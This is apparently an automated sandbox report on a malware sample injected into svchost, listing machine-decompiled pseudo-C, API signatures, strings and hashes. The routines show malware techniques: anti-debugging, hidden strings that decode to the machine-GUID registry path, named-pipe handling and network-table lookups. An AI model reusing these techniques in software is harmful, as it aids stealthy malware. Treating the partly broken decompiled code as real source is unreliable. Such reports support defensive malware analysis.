                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Exception$Throw$FileHeaderRaise
                                                            • String ID:
                                                            • API String ID: 3102897148-0
                                                            • Opcode ID: 5172e8af33684fcba29193f16751249df40b2a00257addb6106f51b62e87130b
                                                            • Instruction ID: 242408c23d01e9d814ffe6cd469aebe7d96c7f2a6164dfe1352255b0e7fa80f7
                                                            • Opcode Fuzzy Hash: 5172e8af33684fcba29193f16751249df40b2a00257addb6106f51b62e87130b
                                                            • Instruction Fuzzy Hash: 1F2165A7710A4099D72DEFB2E85A1EE3312E784BC4F089536BE594BB5BDF35D0118640
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateEvent$CloseHandleInitializeObjectSingleWait
                                                            • String ID:
                                                            • API String ID: 3162378676-0
                                                            • Opcode ID: 12ba334856dcd203e75df68d0a5d8bb30e6e794c20654e4eb00e3122ff515e47
                                                            • Instruction ID: 0747033308b97927b923bd0a77ac23baad085cb08d860b4878e7742ad0c651a6
                                                            • Opcode Fuzzy Hash: 12ba334856dcd203e75df68d0a5d8bb30e6e794c20654e4eb00e3122ff515e47
                                                            • Instruction Fuzzy Hash: 3231BF33601B80A2EB69CFA5F54878977A5F788B84F144126EB9D03B69DF39C0A0C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirst$Create
                                                            • String ID: n$q
                                                            • API String ID: 2053571766-1810014004
                                                            • Opcode ID: bdb2fb86379ed65c588ff15d9588b12b90949342f46599e925e8a151b4b1b06a
                                                            • Instruction ID: 2affdd1ed37811a7a2975801f4974d2e02e63c888fa2f9ef2ab7f7edda19d5cf
                                                            • Opcode Fuzzy Hash: bdb2fb86379ed65c588ff15d9588b12b90949342f46599e925e8a151b4b1b06a
                                                            • Instruction Fuzzy Hash: 3C31F823204A84A5EF319B69D0ADBDE3360FB41BA4F545318CB2A077CACF3AC054C780
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 61%
                                                            			E0000022B22BAF55BA64(long long __rbx, intOrPtr* __rcx, void* __rdx, void* __r8, long long _a8) {
                                                            				void* __rdi;
                                                            				void* _t16;
                                                            				signed short _t17;
                                                            				int _t18;
                                                            				void* _t19;
                                                            				void* _t25;
                                                            				void* _t26;
                                                            				intOrPtr* _t41;
                                                            
                                                            				_t40 = __rdx;
                                                            				_a8 = __rbx;
                                                            				_t41 = __rcx;
                                                            				_t2 = _t40 + 0x28; // 0x28
                                                            				r8d = _t2;
                                                            				_t16 = E0000022B22BAF563830(_t19, 0, _t25, _t26, __rcx + __r8, __rdx, __rcx, __r8);
                                                            				 *(_t41 + 0x50) =  *(_t41 + 0x50) & 0x00000000;
                                                            				 *(_t41 + 0x58) =  *(_t41 + 0x58) & 0x00000000;
                                                            				 *(_t41 + 0x5c) =  *(_t41 + 0x5c) & 0x00000000;
                                                            				r8d = 0;
                                                            				 *((long long*)(_t41 + 0x10)) = 0x22baf530000;
                                                            				 *((long long*)(_t41 + 8)) = 0x22baf530000;
                                                            				 *((long long*)(_t41 + 0x20)) = 0xaf57be78;
                                                            				 *_t41 = 0x60;
                                                            				 *((intOrPtr*)(_t41 + 0x18)) = 0xe00;
                                                            				0xaf531990();
                                                            				if (_t16 != 0) goto 0xaf55bafb;
                                                            				_t17 = GetLastError();
                                                            				_t22 =  <=  ? _t17 : _t17 & 0x0000ffff | 0x80070000;
                                                            				_t29 =  <=  ? _t17 : _t17 & 0x0000ffff | 0x80070000;
                                                            				if (( <=  ? _t17 : _t17 & 0x0000ffff | 0x80070000) >= 0) goto 0xaf55bafb;
                                                            				_t18 = IsDebuggerPresent();
                                                            				if (_t18 == 0) goto 0xaf55baf4;
                                                            				OutputDebugStringW(??);
                                                            				 *0xaf599c00 = 1;
                                                            				return _t18;
                                                            			}











                                                            0x22baf55ba64
                                                            0x22baf55ba64
                                                            0x22baf55ba70
                                                            0x22baf55ba73
                                                            0x22baf55ba73
                                                            0x22baf55ba7a
                                                            0x22baf55ba7f
                                                            0x22baf55ba8b
                                                            0x22baf55ba93
                                                            0x22baf55ba97
                                                            0x22baf55ba9a
                                                            0x22baf55baa0
                                                            0x22baf55baab
                                                            0x22baf55baaf
                                                            0x22baf55bab5
                                                            0x22baf55babc
                                                            0x22baf55bac3
                                                            0x22baf55bac5
                                                            0x22baf55bad6
                                                            0x22baf55bad9
                                                            0x22baf55badb
                                                            0x22baf55badd
                                                            0x22baf55bae5
                                                            0x22baf55baee
                                                            0x22baf55baf4
                                                            0x22baf55bb08

                                                            APIs
                                                            Strings
                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0000022BAF55BAE7
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: DebugDebuggerErrorLastOutputPresentString
                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                            • API String ID: 389471666-631824599
                                                            • Opcode ID: f7893e8bb05ce6867ba3fe5fae8ebfecaafd2d519f5aadc1416d0d497b0893cb
                                                            • Instruction ID: 7eb1c47d40e54894353b733e272f45d3ca61bb49aedc440e113c021c505b87e0
                                                            • Opcode Fuzzy Hash: f7893e8bb05ce6867ba3fe5fae8ebfecaafd2d519f5aadc1416d0d497b0893cb
                                                            • Instruction Fuzzy Hash: C7117033210B80B7FB269BA6DA5C3E933A4FB44345F444125C74982A56EF7AD4B4C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 47%
                                                            			E0000022B22BAF544620(void* __eflags, long long __rbx, long long __rcx, long long __rdx, void* __r8, void* __r9, long long _a8) {
                                                            				long long _v16;
                                                            				char _v24;
                                                            				long long _v32;
                                                            				char _v40;
                                                            				long long _v48;
                                                            				intOrPtr _v56;
                                                            				void* __rdi;
                                                            				int _t33;
                                                            				long long _t51;
                                                            				long long _t60;
                                                            				void* _t61;
                                                            				void* _t65;
                                                            
                                                            				_t65 = __r8;
                                                            				_t51 = __rbx;
                                                            				_t44 = __eflags;
                                                            				_a8 = __rbx;
                                                            				 *((long long*)(__rcx + 8)) = __rdx;
                                                            				 *((long long*)(__rcx)) = 0xaf588cf8;
                                                            				r9d = 0;
                                                            				 *((long long*)(__rdx + 0x68)) = __rcx;
                                                            				_t60 = __rcx;
                                                            				r8d = 0;
                                                            				CreateEventW(??, ??, ??, ??);
                                                            				 *((long long*)(__rcx + 0x10)) = 0xaf588cf8;
                                                            				 *((long long*)(__rcx)) = 0xaf589360;
                                                            				E0000022B22BAF5444A0(__eflags, __rbx, __rcx + 0x40, __rcx, _t61);
                                                            				 *((char*)(__rcx + 0x24)) = 2;
                                                            				 *((intOrPtr*)(__rcx + 0x2c)) = 0x20;
                                                            				E0000022B22BAF55A7EC(0xaf589360, __rcx + 0x40);
                                                            				r8d = 0;
                                                            				_t9 = _t65 + 0x20; // 0x20
                                                            				E0000022B22BAF545190(0x1d8, _t9, _t44, _t51, 0xaf589360, _t61);
                                                            				 *((long long*)(_t60 + 0x148)) = 0xaf589360;
                                                            				 *((char*)(_t60 + 0x18)) = 1;
                                                            				 *((long long*)(_t60 + 0x150)) = 0;
                                                            				r9d = 0;
                                                            				 *((long long*)(_t60 + 0x1c)) = _t51;
                                                            				r8d = 0;
                                                            				_v40 = E0000022B22BAF544D80;
                                                            				 *((intOrPtr*)(_t60 + 0x28)) = 0;
                                                            				_v32 = _t60;
                                                            				_v24 = 1;
                                                            				CreateEventW(??, ??, ??, ??);
                                                            				_v48 = _t51;
                                                            				_v16 = E0000022B22BAF544D80;
                                                            				_v56 = 0;
                                                            				E0000022B22BAF564DA4(0, 0, E0000022B22BAF544D80, _t51, 0xaf589360, _t61, 0xaf548af0,  &_v40);
                                                            				WaitForSingleObject(??, ??);
                                                            				_t33 = CloseHandle(??);
                                                            				 *((long long*)(_t60 + 0x30)) = E0000022B22BAF544D80;
                                                            				return _t33;
                                                            			}















                                                            0x22baf544620
                                                            0x22baf544620
                                                            0x22baf544620
                                                            0x22baf544620
                                                            0x22baf54462a
                                                            0x22baf544635
                                                            0x22baf544638
                                                            0x22baf54463b
                                                            0x22baf54463f
                                                            0x22baf544642
                                                            0x22baf54464b
                                                            0x22baf544651
                                                            0x22baf544660
                                                            0x22baf544663
                                                            0x22baf54466d
                                                            0x22baf544671
                                                            0x22baf544678
                                                            0x22baf54467d
                                                            0x22baf544683
                                                            0x22baf544687
                                                            0x22baf54468c
                                                            0x22baf54469f
                                                            0x22baf5446a3
                                                            0x22baf5446aa
                                                            0x22baf5446b4
                                                            0x22baf5446b8
                                                            0x22baf5446bb
                                                            0x22baf5446c2
                                                            0x22baf5446c7
                                                            0x22baf5446cc
                                                            0x22baf5446d1
                                                            0x22baf5446dc
                                                            0x22baf5446e8
                                                            0x22baf5446ef
                                                            0x22baf5446f5
                                                            0x22baf544705
                                                            0x22baf544710
                                                            0x22baf544716
                                                            0x22baf544727

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Create$Compatible$Window$DesktopEventMonitor$CloseCursorDisplayEnumFromHandleInfoLoadObjectReleaseSettingsSingleWait_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 2947445764-0
                                                            • Opcode ID: 17f28bf0ad5eec56eaa0a60afbe446d503abbc4ff76106eacf6c44ae6944234f
                                                            • Instruction ID: 80b76222bfe15a152accf851e1231d22a4d0b718de0afa6d1d50465839e476e9
                                                            • Opcode Fuzzy Hash: 17f28bf0ad5eec56eaa0a60afbe446d503abbc4ff76106eacf6c44ae6944234f
                                                            • Instruction Fuzzy Hash: A9218E33204B80A3E725DFA5F94978A77A5F784740F144129EB8903F6ADF3AC064CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 68%
                                                            			E0000022B22BAF5471F0(void* __rcx, char* __rdx) {
                                                            				signed int _v16;
                                                            				void* _t6;
                                                            				signed long long _t10;
                                                            				signed long long _t18;
                                                            
                                                            				_t10 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_v16 = _t10 ^ _t18;
                                                            				if (r8d != 1) goto 0xaf547230;
                                                            				if ( *__rdx != 0x23) goto 0xaf547230;
                                                            				SetEvent(??);
                                                            				return E0000022B22BAF55A7C0(_t6, _t10 ^ _t18, _v16 ^ _t18);
                                                            			}







                                                            0x22baf5471f6
                                                            0x22baf547200
                                                            0x22baf54720c
                                                            0x22baf547211
                                                            0x22baf547217
                                                            0x22baf54722f

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$FileLocalNamedPeekPipe$AllocEventFreeReadSleepWrite
                                                            • String ID:
                                                            • API String ID: 1791913936-0
                                                            • Opcode ID: 3b5005362819645c104160e6c69d314e32e72f5ed804e8bfea7c2ded08b8279e
                                                            • Instruction ID: 2108f3b5f67730d0d51c3aba492ac20d400d2227020c2758a5d70b6234ddae7e
                                                            • Opcode Fuzzy Hash: 3b5005362819645c104160e6c69d314e32e72f5ed804e8bfea7c2ded08b8279e
                                                            • Instruction Fuzzy Hash: DF819F33725A44A6EE759BA1F45D39E77A1F784B91F000511EA8E07BAADF3AC084CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 29%
                                                            			E0000022B22BAF549800(long long __rbx, void* __rcx, void* __rdx, long long __rsi) {
                                                            				long _t104;
                                                            				signed short _t111;
                                                            				signed short _t115;
                                                            				signed short _t118;
                                                            				signed int _t125;
                                                            				signed short _t128;
                                                            				signed int _t133;
                                                            				signed int _t138;
                                                            				signed long long _t161;
                                                            				signed long long _t162;
                                                            				signed long long _t166;
                                                            				signed short* _t180;
                                                            				int _t182;
                                                            				long long _t185;
                                                            				void** _t187;
                                                            				signed long long* _t188;
                                                            				void* _t190;
                                                            				signed long long _t191;
                                                            				signed short* _t193;
                                                            				int _t201;
                                                            				short* _t203;
                                                            				void* _t206;
                                                            
                                                            				_t185 = __rsi;
                                                            				 *((long long*)(_t190 + 8)) = __rbx;
                                                            				 *((long long*)(_t190 + 0x18)) = __rsi;
                                                            				_t188 = _t190 - 0x60;
                                                            				_t191 = _t190 - 0x160;
                                                            				_t161 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t162 = _t161 ^ _t191;
                                                            				_t188[0xa] = _t162;
                                                            				 *((intOrPtr*)(_t191 + 0x50)) = 0x47007b;
                                                            				 *_t188 = _t162;
                                                            				_t188[1] = _t162;
                                                            				_t188[2] = _t162;
                                                            				_t188[3] = _t162;
                                                            				_t188[4] = _t162;
                                                            				r9d = 0x20119;
                                                            				_t188[5] = _t162;
                                                            				r8d = 0;
                                                            				_t188[6] = _t162;
                                                            				_t188[7] = _t162;
                                                            				_t188[8] = _t162;
                                                            				_t188[9] = 0;
                                                            				 *((long long*)(_t191 + 0x20)) = _t191 + 0x38;
                                                            				 *((intOrPtr*)(_t191 + 0x54)) = 0x350036;
                                                            				 *((intOrPtr*)(_t191 + 0x58)) = 0x590037;
                                                            				 *((intOrPtr*)(_t191 + 0x5c)) = 0x300053;
                                                            				 *((intOrPtr*)(_t191 + 0x60)) = 0x2d0036;
                                                            				 *((intOrPtr*)(_t191 + 0x64)) = 0x310030;
                                                            				 *((intOrPtr*)(_t191 + 0x68)) = 0x440036;
                                                            				 *((intOrPtr*)(_t191 + 0x6c)) = 0x34002d;
                                                            				 *((intOrPtr*)(_t191 + 0x70)) = 0x300043;
                                                            				 *((intOrPtr*)(_t191 + 0x74)) = 0x2d0052;
                                                            				 *((intOrPtr*)(_t191 + 0x78)) = 0x300036;
                                                            				 *((intOrPtr*)(_t191 + 0x7c)) = 0x320032;
                                                            				 *((intOrPtr*)(_t188 - 0x80)) = 0x46002d;
                                                            				 *((intOrPtr*)(_t188 - 0x7c)) = 0x450047;
                                                            				 *((intOrPtr*)(_t188 - 0x78)) = 0x430032;
                                                            				 *((intOrPtr*)(_t188 - 0x74)) = 0x320033;
                                                            				 *((intOrPtr*)(_t188 - 0x70)) = 0x360032;
                                                            				 *((intOrPtr*)(_t188 - 0x6c)) = 0x370036;
                                                            				 *((intOrPtr*)(_t188 - 0x68)) = 0x7d0046;
                                                            				 *((short*)(_t188 - 0x64)) = 0;
                                                            				 *((intOrPtr*)(_t191 + 0x30)) = 0x4a;
                                                            				 *((intOrPtr*)(_t188 - 0x40)) = 0x4f0053;
                                                            				 *((intOrPtr*)(_t188 - 0x3c)) = 0x540046;
                                                            				 *((intOrPtr*)(_t188 - 0x38)) = 0x410057;
                                                            				 *((intOrPtr*)(_t188 - 0x34)) = 0x450052;
                                                            				 *((intOrPtr*)(_t188 - 0x30)) = 0x4d005c;
                                                            				 *((intOrPtr*)(_t188 - 0x2c)) = 0x630069;
                                                            				 *((intOrPtr*)(_t188 - 0x28)) = 0x6f0072;
                                                            				 *((intOrPtr*)(_t188 - 0x24)) = 0x6f0073;
                                                            				 *((intOrPtr*)(_t188 - 0x20)) = 0x740066;
                                                            				 *((intOrPtr*)(_t188 - 0x1c)) = 0x43005c;
                                                            				 *((intOrPtr*)(_t188 - 0x18)) = 0x790072;
                                                            				 *((intOrPtr*)(_t188 - 0x14)) = 0x740070;
                                                            				 *((intOrPtr*)(_t188 - 0x10)) = 0x67006f;
                                                            				 *((intOrPtr*)(_t188 - 0xc)) = 0x610072;
                                                            				 *((intOrPtr*)(_t188 - 8)) = 0x680070;
                                                            				 *((intOrPtr*)(_t188 - 4)) = 0x79;
                                                            				 *(_t188 - 0x60) = 0x61004d;
                                                            				 *((intOrPtr*)(_t188 - 0x5c)) = 0x680063;
                                                            				 *((intOrPtr*)(_t188 - 0x58)) = 0x6e0069;
                                                            				 *((intOrPtr*)(_t188 - 0x54)) = 0x470065;
                                                            				 *((intOrPtr*)(_t188 - 0x50)) = 0x690075;
                                                            				 *((intOrPtr*)(_t188 - 0x4c)) = 0x64;
                                                            				 *((long long*)(_t191 + 0x38)) = __rsi;
                                                            				_t104 = RegOpenKeyExW(_t206, _t203, _t201, _t182, _t187);
                                                            				_t61 = _t185 + 1; // 0x1
                                                            				_t125 = _t61;
                                                            				if (_t104 != 0) goto 0xaf549a37;
                                                            				 *((long long*)(_t191 + 0x28)) = _t191 + 0x30;
                                                            				r8d = 0;
                                                            				 *((long long*)(_t191 + 0x20)) = _t188;
                                                            				RegQueryValueExW(??, ??, ??, ??, ??, ??);
                                                            				_t147 =  ==  ? _t125 : 0;
                                                            				RegCloseKey(??);
                                                            				_t150 =  ==  ? _t125 : 0;
                                                            				if (( ==  ? _t125 : 0) == 0) goto 0xaf549a37;
                                                            				if ( *((intOrPtr*)(_t191 + 0x30)) != 0x4a) goto 0xaf549a37;
                                                            				asm("movaps xmm0, [ebp]");
                                                            				asm("movaps xmm1, [ebp+0x10]");
                                                            				asm("movups [esp+0x52], xmm0");
                                                            				asm("movaps xmm0, [ebp+0x20]");
                                                            				asm("movups [esp+0x72], xmm0");
                                                            				asm("movsd xmm0, [ebp+0x40]");
                                                            				asm("movups [esp+0x62], xmm1");
                                                            				asm("movaps xmm1, [ebp+0x30]");
                                                            				asm("movsd [ebp-0x6e], xmm0");
                                                            				asm("movups [ebp-0x7e], xmm1");
                                                            				if ( *((short*)(__rcx + ((_t191 + 0x00000040 | 0xffffffff) + 1) * 2)) != 0) goto 0xaf549a40;
                                                            				_t193 = _t191 + 0x52;
                                                            				if ( *((intOrPtr*)(_t191 + 0x38)) - 0x61 - 0x19 > 0) goto 0xaf549a65;
                                                            				_t128 = ( *_t193 & 0x0000ffff) - 0x20;
                                                            				 *_t193 = _t128;
                                                            				if (_t128 == 0x2d) goto 0xaf549af0;
                                                            				asm("cdq");
                                                            				_t166 = _t125 % r9d;
                                                            				_t111 =  *(__rcx + _t166 * 2) & 0x0000ffff ^ _t128;
                                                            				 *_t193 = _t111;
                                                            				if (_t111 - 0x30 >= 0) goto 0xaf549aa7;
                                                            				_t115 = _t188 - 0x60 + (_t188 - 0x60) * 4 + _t188 - 0x60 + (_t188 - 0x60) * 4;
                                                            				 *_t193 = (_t111 & 0x0000ffff) - _t115 + 0x30;
                                                            				goto 0xaf549af0;
                                                            				_t86 = _t166 - 0x3a; // -57
                                                            				if (_t86 - 6 > 0) goto 0xaf549acc;
                                                            				_t133 = _t115 & 0x0000ffff;
                                                            				_t118 = (0x4ec4ec4f * _t133 >> 0x20 >> 3) * 0x1a;
                                                            				 *_t193 = _t133 - _t118 + 0x41;
                                                            				goto 0xaf549af0;
                                                            				if (_t118 - 0x5a <= 0) goto 0xaf549af0;
                                                            				 *_t193 = 0x5a - (_t118 & 0x0000ffff) - (0x4ec4ec4f * (_t118 & 0x0000ffff) >> 0x20 >> 3) * 0x1a;
                                                            				if (_t125 + 1 - 0x25 < 0) goto 0xaf549a50;
                                                            				_t180 = _t191 + 0x50;
                                                            				_t138 =  *_t180 & 0x0000ffff;
                                                            				 *(__rdx - _t191 + 0x50 + _t180) = _t138;
                                                            				if (_t138 != 0) goto 0xaf549b10;
                                                            				return E0000022B22BAF55A7C0(_t138, __rdx, _t188[0xa] ^ _t191);
                                                            			}

























                                                            0x22baf549800
                                                            0x22baf549800
                                                            0x22baf549805
                                                            0x22baf549812
                                                            0x22baf549817
                                                            0x22baf54981e
                                                            0x22baf549825
                                                            0x22baf549828
                                                            0x22baf54982e
                                                            0x22baf549836
                                                            0x22baf54983d
                                                            0x22baf549845
                                                            0x22baf54984c
                                                            0x22baf549852
                                                            0x22baf549856
                                                            0x22baf54985c
                                                            0x22baf549860
                                                            0x22baf549863
                                                            0x22baf54986e
                                                            0x22baf549872
                                                            0x22baf549876
                                                            0x22baf54987f
                                                            0x22baf549884
                                                            0x22baf54988c
                                                            0x22baf549894
                                                            0x22baf54989c
                                                            0x22baf5498a4
                                                            0x22baf5498ac
                                                            0x22baf5498b4
                                                            0x22baf5498bc
                                                            0x22baf5498c4
                                                            0x22baf5498cc
                                                            0x22baf5498d4
                                                            0x22baf5498dc
                                                            0x22baf5498e3
                                                            0x22baf5498ea
                                                            0x22baf5498f1
                                                            0x22baf5498f8
                                                            0x22baf5498ff
                                                            0x22baf549906
                                                            0x22baf54990d
                                                            0x22baf549911
                                                            0x22baf549919
                                                            0x22baf549920
                                                            0x22baf549927
                                                            0x22baf54992e
                                                            0x22baf549935
                                                            0x22baf54993c
                                                            0x22baf549943
                                                            0x22baf54994a
                                                            0x22baf549951
                                                            0x22baf549958
                                                            0x22baf54995f
                                                            0x22baf549966
                                                            0x22baf54996d
                                                            0x22baf549974
                                                            0x22baf54997b
                                                            0x22baf549982
                                                            0x22baf549989
                                                            0x22baf549990
                                                            0x22baf549997
                                                            0x22baf54999e
                                                            0x22baf5499a5
                                                            0x22baf5499ac
                                                            0x22baf5499b3
                                                            0x22baf5499b8
                                                            0x22baf5499be
                                                            0x22baf5499be
                                                            0x22baf5499c3
                                                            0x22baf5499cf
                                                            0x22baf5499dd
                                                            0x22baf5499e4
                                                            0x22baf5499e9
                                                            0x22baf5499f6
                                                            0x22baf5499f9
                                                            0x22baf5499ff
                                                            0x22baf549a01
                                                            0x22baf549a08
                                                            0x22baf549a0a
                                                            0x22baf549a0e
                                                            0x22baf549a12
                                                            0x22baf549a17
                                                            0x22baf549a1b
                                                            0x22baf549a20
                                                            0x22baf549a25
                                                            0x22baf549a2a
                                                            0x22baf549a2e
                                                            0x22baf549a33
                                                            0x22baf549a49
                                                            0x22baf549a4b
                                                            0x22baf549a5b
                                                            0x22baf549a5d
                                                            0x22baf549a61
                                                            0x22baf549a69
                                                            0x22baf549a71
                                                            0x22baf549a75
                                                            0x22baf549a7c
                                                            0x22baf549a7f
                                                            0x22baf549a87
                                                            0x22baf549a99
                                                            0x22baf549aa1
                                                            0x22baf549aa5
                                                            0x22baf549aa7
                                                            0x22baf549aae
                                                            0x22baf549ab0
                                                            0x22baf549abd
                                                            0x22baf549ac6
                                                            0x22baf549aca
                                                            0x22baf549ad0
                                                            0x22baf549aec
                                                            0x22baf549af9
                                                            0x22baf549b0a
                                                            0x22baf549b10
                                                            0x22baf549b13
                                                            0x22baf549b1f
                                                            0x22baf549b4b

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: -$0$2$6$6$6$6$7$C$J$R$S${
                                                            • API String ID: 3677997916-3063579542
                                                            • Opcode ID: a1ab8e99fba9a69c5f23ce2dec2f1ce038a1c145aa712f734030812b5c0c1fee
                                                            • Instruction ID: 28f9a6d2066be9682477737043b0ba89a2ee1fb2fdabc879cd6e191afe793e74
                                                            • Opcode Fuzzy Hash: a1ab8e99fba9a69c5f23ce2dec2f1ce038a1c145aa712f734030812b5c0c1fee
                                                            • Instruction Fuzzy Hash: 3891BD73A10780CEE3158FB5E4493DE7BB1F344358F40921AEB891BA59DBBAC589CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseHandle$DisconnectNamedPipeTerminate$Thread$ObjectProcessSingleWait
                                                            • String ID:
                                                            • API String ID: 1450516946-0
                                                            • Opcode ID: e2bbab730714467e888a42ff990e39292ec8710a60bd972ad5de2762d5e8df5a
                                                            • Instruction ID: ee12c8554b3c03e868f956019faab2897ecce899bfcf914263d4edb53dc915fb
                                                            • Opcode Fuzzy Hash: e2bbab730714467e888a42ff990e39292ec8710a60bd972ad5de2762d5e8df5a
                                                            • Instruction Fuzzy Hash: 1C314A27611A04A2EF66DFB2E85C2A83365FB88F56F045911CD0E47739DF3AC485D341
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetExtendedUdpTable$iphlpapi.dll
                                                            • API String ID: 2574300362-1809394930
                                                            • Opcode ID: 3b7bc18c4035dde0ed46104c4aebbea5a42ba7606e6a06fd767bbcabfd282984
                                                            • Instruction ID: 24da9a34ce84e12c81627ef8a78f8cf284b86ba1271d2c3bba51b890062bf916
                                                            • Opcode Fuzzy Hash: 3b7bc18c4035dde0ed46104c4aebbea5a42ba7606e6a06fd767bbcabfd282984
                                                            • Instruction Fuzzy Hash: 2171BC33604B84A2EB76DF99E85C3DA73A0FB88740F044615DA8A43B5AEF3ED545CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close$DeleteOpenwsprintf$CreateValue$DirectoryEventFileQuerySystem
                                                            • String ID: Control$Global$SOFTWARE\Classes\CLSID\%s$winssyslog
                                                            • API String ID: 164381605-1386177884
                                                            • Opcode ID: 8e79da5c422383f720400f05318d21e518a3645813ff14ef911b6f06848c1be2
                                                            • Instruction ID: 446ab2e1ad2da656338b0dd579ecc1e0880bc42fc5405a0e58346671eea5a9b8
                                                            • Opcode Fuzzy Hash: 8e79da5c422383f720400f05318d21e518a3645813ff14ef911b6f06848c1be2
                                                            • Instruction Fuzzy Hash: 40417E73224A85F2EF219F61F85D7CA7361FB80748F801111DA9E47A6ADF3AC509C780
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 18%
                                                            			E0000022B22BAF5378A0(long long __rbx, void* __rcx, long long _a16) {
                                                            				signed int _v24;
                                                            				char _v552;
                                                            				char _v1080;
                                                            				signed long long _v1096;
                                                            				signed long long _v1104;
                                                            				char _v1112;
                                                            				long long _v1120;
                                                            				long _v1128;
                                                            				long long _v1144;
                                                            				void* _t33;
                                                            				void* _t36;
                                                            				signed long long _t56;
                                                            				signed long long _t57;
                                                            				void* _t82;
                                                            				void* _t83;
                                                            				void* _t84;
                                                            				void* _t85;
                                                            
                                                            				_t59 = __rbx;
                                                            				_a16 = __rbx;
                                                            				_t56 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t57 = _t56 ^ _t85 - 0x000004a0;
                                                            				_v24 = _t57;
                                                            				_t82 = __rcx;
                                                            				_v1128 = 0x104;
                                                            				if (E0000022B22BAF54D980(__rcx) != 0) goto 0xaf5378f7;
                                                            				E0000022B22BAF54DA20();
                                                            				r8d = _v1128;
                                                            				_v1128 = GetEnvironmentVariableW(??, ??, ??);
                                                            				goto 0xaf53796b;
                                                            				_t33 = E0000022B22BAF54AAD0(__rbx, _t83, _t84);
                                                            				_v1120 = 0;
                                                            				LoadLibraryA(??);
                                                            				if (_t57 == 0) goto 0xaf537a02;
                                                            				GetProcAddress(??, ??);
                                                            				if (_t57 == 0) goto 0xaf537a02;
                                                            				_t36 =  *_t57();
                                                            				if (_t36 == 0) goto 0xaf537a02;
                                                            				__imp__GetUserProfileDirectoryW();
                                                            				CloseHandle(??);
                                                            				if (_t36 == 0) goto 0xaf537a02;
                                                            				lstrcatW(??, ??);
                                                            				wsprintfW(??, ??);
